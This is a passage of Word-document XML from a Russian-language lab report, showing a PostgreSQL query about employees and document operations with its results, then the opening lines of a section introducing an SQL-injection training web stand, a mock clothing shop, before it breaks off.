              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EEC2A61" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B"/>
    <w:p w14:paraId="352290C6" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Результат выполнения включал документы DOC-003, DOC-008 и DOC-010. Их даты окончания действия относятся соответственно к марту, августу и октябрю 2025 года. Все эти месяцы не входят в заданный перечень май–июнь–июль, поэтому результат соответствует условию задачи.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A18C4FD" w14:textId="1047020A" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Третий запрос был наиболее сложным, так как включал два альтернативных условия. Требовалось найти сотрудников, которые либо совершили с каким-либо документом все операции из заданного перечня, либо являются ответственными за документы, по которым они сами не выполняли операций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C904226" w14:textId="21973F1B" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Листинг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2601B">
        <w:t xml:space="preserve">Запрос </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9622"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2601B" w:rsidRPr="00C2601B" w14:paraId="6A510381" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E0E173B" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SELECT DISTINCT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>result.employee</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1D9DE337" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t>FROM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D2271F9" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D7B31C0" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    SELECT DISTINCT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>op.employee</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3A3079DA" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>document_operations</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> op</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70BF77A2" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    WHERE NOT EXISTS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C5D8114" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A2DC697" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        SELECT 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39285F1B" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        FROM </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>unnest(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>ARRAY[</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CD556E3" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>'Создание документа',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F7338A0" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">            'Проверка документа',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02503D20" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">            'Согласование документа'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B45B6C9" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>]::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">text[]) AS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>possible_operation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>operation_description</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C8225C6" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        WHERE NOT EXISTS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47EFE4DC" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="592BB425" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            SELECT 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CAAE2AE" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>document_operations</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>op_check</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="42C714FD" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>op_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>check.employee</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>op.employee_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6A7CF76A" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">              AND </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>op_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>check.document</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>op.document_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="572C7E9D" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">              AND </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>op_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>check.operation</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_description</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>possible_operation.operation_description</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="61023675" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CF01626" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="118E7C03" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22382827" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    UNION</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F692853" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="603CCEEB" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    SELECT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>d.responsible</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_employee</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> AS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>employee_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="17DAF440" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    FROM documents d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45D8FDC9" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    WHERE NOT EXISTS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="308CED40" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="297672F0" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        SELECT 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40242DFD" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>document_operations</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> op</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="470523B8" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>op.document</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>d.document_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2B381765" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          AND </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>op.employee</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>d.responsible_employee</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="21E65775" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CB5EE36" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t>) AS result</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30CAACB9" w14:textId="0A8044C5" w:rsidR="00C2601B" w:rsidRPr="00B02A76" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ORDER BY </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>result.employee</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68F8A55C" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A44231A" w14:textId="75DAE10D" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00C2601B">
        <w:t>Таблица 7 – Результат запроса 3</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9912"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2601B" w14:paraId="590B472D" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9914" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="230384D3" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>employee_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="11EDC442" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9914" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20B66FDA" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Сотрудник_А</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="252B9DCF" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9914" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="698EC515" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Сотрудник_В</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="7D2F33A1" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9914" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1551C640" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Сотрудник_Г</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16DC920A" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B"/>
    <w:p w14:paraId="26DB4880" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Результат выполнения запроса включал сотрудников </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Сотрудник_А</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Сотрудник_В</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Сотрудник_Г</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Полученный результат показывает, что запрос корректно объединяет две разные логики: полноту набора операций и отсутствие собственных операций у ответственного сотрудника.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6AEDEE" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00903505"/>
    <w:p w14:paraId="5B58D23F" w14:textId="79E69A07" w:rsidR="00160CFD" w:rsidRDefault="00C2601B" w:rsidP="00160CFD">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00C2601B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Подготовка и разведка </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>-стенда</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182E7B33" w14:textId="2C6CC231" w:rsidR="007A62FE" w:rsidRDefault="00C2601B" w:rsidP="007A62FE">
      <w:r w:rsidRPr="00C2601B">
        <w:t xml:space="preserve">После завершения первой части был создан индивидуальный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t xml:space="preserve">-стенд </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>Cheerful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>-Island. Сайт представлял собой магазин одежды с каталогом товаров, категориями, формой входа, личным кабинетом, корзиной, избранным и отзывами. Основной URL стенда имел вид /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>away</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>/281597ea-a798-410d-9e81-43bb6b4ce978.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6806554E" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00C2601B">
        <w:t xml:space="preserve">Таблица 8 – Параметры </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>-стенда</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="9985" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3118"/>
        <w:gridCol w:w="6867"/>
      </w:tblGrid>
